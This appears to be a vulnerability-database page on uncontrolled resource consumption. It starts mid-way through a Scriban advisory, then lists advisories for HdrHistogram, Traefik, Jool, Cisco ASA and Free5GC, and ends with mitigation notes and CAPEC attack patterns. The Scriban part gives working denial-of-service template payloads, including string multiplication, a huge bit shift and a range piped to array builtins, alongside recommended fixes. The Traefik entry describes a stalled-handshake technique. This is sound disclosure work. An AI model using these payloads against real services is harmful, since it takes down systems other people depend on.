`StepLoop()` is only called in `ScriptForStatement` and `ScriptWhileStatement` \u2014 it is never called in any function under `src/Scriban/Functions/`. For example:\n\n- `ArrayFunctions.Size` (line 609) calls `.Cast\u003cobject\u003e().Count()`, fully enumerating the range\n- `ArrayFunctions.Join` (line 388) iterates with `foreach` and appends to a `StringBuilder` with no size limit\n\n## PoC\n\n### Vector 1 \u2014 String multiplication OOM:\n```csharp\nvar template = Template.Parse(\"{{ \u0027AAAA\u0027 * 500000000 }}\");\nvar context = new TemplateContext();\n// context.LimitToString is 1048576 by default \u2014 does NOT protect this path\ntemplate.Render(context); // OutOfMemoryException: attempts ~2GB allocation\n```\n\n### Vector 2 \u2014 BigInteger shift OOM:\n```csharp\nvar template = Template.Parse(\"{{ 1 \u003c\u003c 100000000 }}\");\nvar context = new TemplateContext();\ntemplate.Render(context); // Allocates BigInteger with 100M bits (~12.5MB)\n// {{ 1 \u003c\u003c 2000000000 }} attempts ~250MB\n```\n\n### Vector 3 \u2014 LoopLimit bypass via range + builtin:\n```csharp\nvar template = Template.Parse(\"{{ (0..1000000000) | array.size }}\");\nvar context = new TemplateContext();\n// context.LoopLimit is 1000 \u2014 does NOT protect builtin function iteration\ntemplate.Render(context); // CPU exhaustion: enumerates 1 billion items\n```\n\n```csharp\nvar template = Template.Parse(\"{{ (0..10000000) | array.join \u0027,\u0027 }}\");\nvar context = new TemplateContext();\ntemplate.Render(context); // Memory exhaustion: builds ~80MB+ joined string\n```\n\n## Impact\n\nAn attacker who can supply a Scriban template (common in CMS platforms, email templating systems, reporting tools, and other applications embedding Scriban) can cause denial of service by crashing the host process via `OutOfMemoryException` or exhausting CPU resources. This is particularly impactful because:\n\n1. Applications relying on the default safety controls (`LoopLimit=1000`, `LimitToString=1MB`) believe they are protected against resource exhaustion from untrusted templates, but these controls have gaps.\n2. A single malicious template expression is sufficient \u2014 no complex template logic is required.\n3. The `OutOfMemoryException` in vectors 1 and 2 typically terminates the entire process, not just the template evaluation.\n\n## Recommended Fix\n\n### Vector 1 \u2014 String multiplication: Check `LimitToString` before the loop\n\n```csharp\n// src/Scriban/Syntax/Expressions/ScriptBinaryExpression.cs, before line 330\nvar leftText = context.ObjectToString(left);\nif (context.LimitToString \u003e 0 \u0026\u0026 (long)value * leftText.Length \u003e context.LimitToString)\n{\n    throw new ScriptRuntimeException(span,\n        $\"String multiplication would exceed LimitToString ({context.LimitToString} characters)\");\n}\nvar builder = new StringBuilder();\nfor (int i = 0; i \u003c value; i++)\n```\n\n### Vector 2 \u2014 BigInteger shift: Cap the shift amount\n\n```csharp\n// src/Scriban/Syntax/Expressions/ScriptBinaryExpression.cs, lines 710-711 and 783-784\ncase ScriptBinaryOperator.ShiftLeft:\n    if (right \u003e 1048576) // Same as MaxBigInteger bit count\n        throw new ScriptRuntimeException(span,\n            $\"Shift amount {right} exceeds maximum allowed (1048576)\");\n    return (BigInteger)left \u003c\u003c (int)right;\n```\n\n### Vector 3 \u2014 Range + builtins: Add iteration counting to range iterators\n\nPass `TemplateContext` to `RangeInclude`/`RangeExclude` and enforce a limit:\n\n```csharp\nprivate static IEnumerable\u003cobject\u003e RangeInclude(TemplateContext context, BigInteger left, BigInteger right)\n{\n    var maxRange = context.LoopLimit \u003e 0 ? context.LoopLimit : int.MaxValue;\n    int count = 0;\n    if (left \u003c right)\n    {\n        for (var i = left; i \u003c= right; i++)\n        {\n            if (++count \u003e maxRange)\n                throw new ScriptRuntimeException(context.CurrentNode.Span,\n                    $\"Range enumeration exceeds LoopLimit ({maxRange})\");\n            yield return FitToBestInteger(i);\n        }\n    }\n    // ... same for descending branch\n}\n```\n\nAlternatively, validate range size eagerly at creation time: `if (BigInteger.Abs(right - left) \u003e maxRange) throw ...`",
  "id": "GHSA-xw6w-9jjh-p9cr",
  "modified": "2026-07-06T13:10:09Z",
  "published": "2026-03-24T22:16:01Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/scriban/scriban/security/advisories/GHSA-xw6w-9jjh-p9cr"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/scriban/scriban"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Scriban has Multiple Denial-of-Service Vectors via Unbounded Resource Consumption During Expression Evaluation"
}

GHSA-XW83-8GP3-PG5Q

Vulnerability from github – Published: 2026-07-05 00:31 – Updated: 2026-07-05 00:31
VLAI
Details

A vulnerability was detected in HdrHistogram up to 2.2.2. Affected by this issue is the function org.HdrHistogram.AbstractHistogram.decodeFromCompressedByteBuffer of the file src/main/java/org/HdrHistogram/AbstractHistogram.java. The manipulation of the argument lengthOfCompressedContents results in uncontrolled memory allocation. The attack needs to be approached locally. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-14683"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-07-04T23:16:55Z",
    "severity": "LOW"
  },
  "details": "A vulnerability was detected in HdrHistogram up to 2.2.2. Affected by this issue is the function org.HdrHistogram.AbstractHistogram.decodeFromCompressedByteBuffer of the file src/main/java/org/HdrHistogram/AbstractHistogram.java. The manipulation of the argument lengthOfCompressedContents results in uncontrolled memory allocation. The attack needs to be approached locally. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.",
  "id": "GHSA-xw83-8gp3-pg5q",
  "modified": "2026-07-05T00:31:42Z",
  "published": "2026-07-05T00:31:42Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14683"
    },
    {
      "type": "WEB",
      "url": "https://github.com/HdrHistogram/HdrHistogram/issues/219"
    },
    {
      "type": "WEB",
      "url": "https://github.com/HdrHistogram/HdrHistogram"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/cve/CVE-2026-14683"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/submit/846750"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/submit/846752"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/376279"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/376279/cti"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-XW98-5Q62-JX94

Vulnerability from github – Published: 2026-03-04 18:29 – Updated: 2026-03-05 22:29
VLAI
Summary
Traefik: tcp router clears read deadlines before tls forwarding, enabling stalled handshakes (Slowloris DOS)
Details

Impact

There is a potential vulnerability in Traefik managing TLS handshake on TCP routers.

When Traefik processes a TLS connection on a TCP router, the read deadline used to bound protocol sniffing is cleared before the TLS handshake is completed. When a TLS handshake read error occurs, the code attempts a second handshake with different connection parameters, silently ignoring the initial error. A remote unauthenticated client can exploit this by sending an incomplete TLS record and stopping further data transmission, causing the TLS handshake to stall indefinitely and holding connections open.

By opening many such stalled connections in parallel, an attacker can exhaust file descriptors and goroutines, degrading availability of all services on the affected entrypoint.

Patches

  • https://github.com/traefik/traefik/releases/tag/v2.11.38
  • https://github.com/traefik/traefik/releases/tag/v3.6.9

Workarounds

No workaround available.

For more information

If there are any questions or comments about this advisory, please open an issue.


Original Description Traefik's TCP router uses a connection-level read deadline to bound protocol sniffing (peeking a TLS client hello), but then clears the deadline via conn.SetDeadline(time.Time{}) before delegating the connection to TLS forwarding. A remote unauthenticated client can send an incomplete TLS record header and stop sending data. After the initial peek times out, the router clears the deadline and the subsequent TLS handshake reads can stall indefinitely, holding connections open and consuming resources. ### Expected vs Actual Expected: if an entrypoint-level read deadline is used to bound initial protocol sniffing, TLS handshake reads should remain bounded by a deadline (either the same deadline is preserved, or a dedicated handshake timeout is enforced). Actual: after protocol sniffing the router clears the connection deadline and delegates to TLS handling; an attacker can keep the TLS handshake stalled beyond the configured read timeout. ### Severity HIGH CWE: CWE-400 (Uncontrolled Resource Consumption) ### Affected Code - pkg/server/router/tcp/router.go: (*Router).ServeTCP clears the deadline before TLS forwarding - conn.SetDeadline(time.Time{}) removes the entrypoint-level deadline that previously bounded reads ### Root Cause In (*Router).ServeTCP, after sniffing a TLS client hello, the router removes the connection read deadline: // Remove read/write deadline and delegate this to underlying TCP server // (for now only handled by HTTP Server) if err := conn.SetDeadline(time.Time{}); err != nil { ... } TLS handshake reads that happen after this point are not guaranteed to have any deadline, so a client that stops sending bytes can keep the connection open indefinitely. ### Attacker Control Attacker-controlled input is the raw TCP byte stream on an entrypoint that routes to a TLS forwarder. The attacker controls: 1. Sending a partial TLS record header (enough to trigger the TLS sniffing path) 2. Stopping further sends so the subsequent handshake read blocks ### Impact Each stalled connection occupies file descriptors and goroutines (and may consume additional memory depending on buffering). By opening many such connections in parallel, an attacker can cause resource exhaustion and degrade availability. ### Reproduction Attachments include poc.zip with a self-contained integration harness. It pins the repository commit, applies fix.patch as the control variant, and runs a regression-style test that demonstrates the stall in canonical mode and the timeout in control mode. Run canonical (vulnerable): unzip poc.zip -d poc cd poc make test Canonical output excerpt: PROOF_MARKER Run control (deadline preserved / no stall): unzip poc.zip -d poc cd poc make control Control output excerpt: NC_MARKER ### Recommended Fix Do not clear the entrypoint-level deadline prior to completing TLS handshake, or enforce a dedicated handshake timeout for the TLS forwarder path. Fix accepted when: an incomplete TLS record cannot stall past the configured entrypoint-level read deadline (or an explicit handshake timeout), and a regression test covers the canonical/control behavior.
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.11.37"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.11.38"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.6.8"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.6.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-26999"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-04T18:29:09Z",
    "nvd_published_at": "2026-03-05T19:16:05Z",
    "severity": "HIGH"
  },
  "details": "## Impact\n\nThere is a potential vulnerability in Traefik managing TLS handshake on TCP routers.\n\nWhen Traefik processes a TLS connection on a TCP router, the read deadline used to bound protocol sniffing is cleared before the TLS handshake is completed. When a TLS handshake read error occurs, the code attempts a second handshake with different connection parameters, silently ignoring the initial error. A remote unauthenticated client can exploit this by sending an incomplete TLS record and stopping further data transmission, causing the TLS handshake to stall indefinitely and holding connections open.\n\nBy opening many such stalled connections in parallel, an attacker can exhaust file descriptors and goroutines, degrading availability of all services on the affected entrypoint.\n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v2.11.38\n- https://github.com/traefik/traefik/releases/tag/v3.6.9\n\n## Workarounds\n\nNo workaround available.\n\n## For more information\n\nIf there are any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal Description\u003c/summary\u003e\n\nTraefik\u0027s TCP router uses a connection-level read deadline to bound protocol sniffing (peeking a TLS client hello), but then clears the deadline via conn.SetDeadline(time.Time{}) before delegating the connection to TLS forwarding.\n\nA remote unauthenticated client can send an incomplete TLS record header and stop sending data. After the initial peek times out, the router clears the deadline and the subsequent TLS handshake reads can stall indefinitely, holding connections open and consuming resources.\n\n### Expected vs Actual\n\nExpected: if an entrypoint-level read deadline is used to bound initial protocol sniffing, TLS handshake reads should remain bounded by a deadline (either the same deadline is preserved, or a dedicated handshake timeout is enforced).\n\nActual: after protocol sniffing the router clears the connection deadline and delegates to TLS handling; an attacker can keep the TLS handshake stalled beyond the configured read timeout.\n\n### Severity\n\nHIGH\nCWE: CWE-400 (Uncontrolled Resource Consumption)\n\n### Affected Code\n\n- pkg/server/router/tcp/router.go: (*Router).ServeTCP clears the deadline before TLS forwarding\n- conn.SetDeadline(time.Time{}) removes the entrypoint-level deadline that previously bounded reads\n\n### Root Cause\n\nIn (*Router).ServeTCP, after sniffing a TLS client hello, the router removes the connection read deadline:\n\n    // Remove read/write deadline and delegate this to underlying TCP server\n    // (for now only handled by HTTP Server)\n    if err := conn.SetDeadline(time.Time{}); err != nil {\n        ...\n    }\n\nTLS handshake reads that happen after this point are not guaranteed to have any deadline, so a client that stops sending bytes can keep the connection open indefinitely.\n\n### Attacker Control\n\nAttacker-controlled input is the raw TCP byte stream on an entrypoint that routes to a TLS forwarder. The attacker controls:\n\n1. Sending a partial TLS record header (enough to trigger the TLS sniffing path)\n2. Stopping further sends so the subsequent handshake read blocks\n\n### Impact\n\nEach stalled connection occupies file descriptors and goroutines (and may consume additional memory depending on buffering). By opening many such connections in parallel, an attacker can cause resource exhaustion and degrade availability.\n\n### Reproduction\n\nAttachments include poc.zip with a self-contained integration harness. It pins the repository commit, applies fix.patch as the control variant, and runs a regression-style test that demonstrates the stall in canonical mode and the timeout in control mode.\n\nRun canonical (vulnerable):\n\n    unzip poc.zip -d poc\n    cd poc\n    make test\n\nCanonical output excerpt: PROOF_MARKER\n\nRun control (deadline preserved / no stall):\n\n    unzip poc.zip -d poc\n    cd poc\n    make control\n\nControl output excerpt: NC_MARKER\n\n### Recommended Fix\n\nDo not clear the entrypoint-level deadline prior to completing TLS handshake, or enforce a dedicated handshake timeout for the TLS forwarder path.\n\nFix accepted when: an incomplete TLS record cannot stall past the configured entrypoint-level read deadline (or an explicit handshake timeout), and a regression test covers the canonical/control behavior.\n\n\u003c/details\u003e",
  "id": "GHSA-xw98-5q62-jx94",
  "modified": "2026-03-05T22:29:00Z",
  "published": "2026-03-04T18:29:09Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/security/advisories/GHSA-xw98-5q62-jx94"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26999"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/traefik/traefik"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v2.11.38"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.6.9"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Traefik: tcp router clears read deadlines before tls forwarding, enabling stalled handshakes (Slowloris DOS)"
}

GHSA-XW9G-79Q2-3VJW

Vulnerability from github – Published: 2022-05-17 00:18 – Updated: 2022-05-17 00:18
VLAI
Details

Jool 3.5.0-3.5.1 is vulnerable to a kernel crashing packet resulting in a DOS.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-1000191"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-11-17T17:29:00Z",
    "severity": "HIGH"
  },
  "details": "Jool 3.5.0-3.5.1 is vulnerable to a kernel crashing packet resulting in a DOS.",
  "id": "GHSA-xw9g-79q2-3vjw",
  "modified": "2022-05-17T00:18:37Z",
  "published": "2022-05-17T00:18:37Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000191"
    },
    {
      "type": "WEB",
      "url": "https://github.com/NICMx/Jool/issues/232"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XWCW-M39W-GG87

Vulnerability from github – Published: 2022-05-24 17:31 – Updated: 2023-08-16 18:30
VLAI
Details

A vulnerability in the SSL VPN negotiation process for Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a reload of an affected device, resulting in a denial of service (DoS) condition. The vulnerability is due to inefficient direct memory access (DMA) memory management during the negotiation phase of an SSL VPN connection. An attacker could exploit this vulnerability by sending a steady stream of crafted Datagram TLS (DTLS) traffic to an affected device. A successful exploit could allow the attacker to exhaust DMA memory on the device and cause a DoS condition.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-3529"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-10-21T19:15:00Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability in the SSL VPN negotiation process for Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a reload of an affected device, resulting in a denial of service (DoS) condition. The vulnerability is due to inefficient direct memory access (DMA) memory management during the negotiation phase of an SSL VPN connection. An attacker could exploit this vulnerability by sending a steady stream of crafted Datagram TLS (DTLS) traffic to an affected device. A successful exploit could allow the attacker to exhaust DMA memory on the device and cause a DoS condition.",
  "id": "GHSA-xwcw-m39w-gg87",
  "modified": "2023-08-16T18:30:19Z",
  "published": "2022-05-24T17:31:47Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-3529"
    },
    {
      "type": "WEB",
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-sslvpndma-dos-HRrqB9Yx"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XWF4-W8F7-PWR9

Vulnerability from github – Published: 2026-03-24 15:30 – Updated: 2026-03-24 18:31
VLAI
Details

An issue in Free5GC v.4.2.0 and before allows a remote attacker to cause a denial of service via the function HandleAuthenticationFailure of the component AMF

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-30653"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-24T15:16:34Z",
    "severity": "HIGH"
  },
  "details": "An issue in Free5GC v.4.2.0 and before allows a remote attacker to cause a denial of service via the function HandleAuthenticationFailure of the component AMF",
  "id": "GHSA-xwf4-w8f7-pwr9",
  "modified": "2026-03-24T18:31:34Z",
  "published": "2026-03-24T15:30:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30653"
    },
    {
      "type": "WEB",
      "url": "https://github.com/free5gc/free5gc/issues/826"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold.

Mitigation
Architecture and Design
  • Mitigation of resource exhaustion attacks requires that the target system either:
  • The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question.
  • The second solution is simply difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply makes the attack require more resources on the part of the attacker.
  • recognizes the attack and denies that user further access for a given amount of time, or
  • uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed.
Mitigation
Architecture and Design

Ensure that protocols have specific limits of scale placed on them.

Mitigation
Implementation

Ensure that all failures in resource allocation place the system into a safe posture.

CAPEC-147: XML Ping of the Death

An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target.

CAPEC-227: Sustained Client Engagement

An adversary attempts to deny legitimate users access to a resource by continually engaging a specific resource in an attempt to keep the resource tied up as long as possible. The adversary's primary goal is not to crash or flood the target, which would alert defenders; rather it is to repeatedly perform actions or abuse algorithmic flaws such that a given resource is tied up and not available to a legitimate user. By carefully crafting a requests that keep the resource engaged through what is seemingly benign requests, legitimate users are limited or completely denied access to the resource.

CAPEC-492: Regular Expression Exponential Blowup

An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions.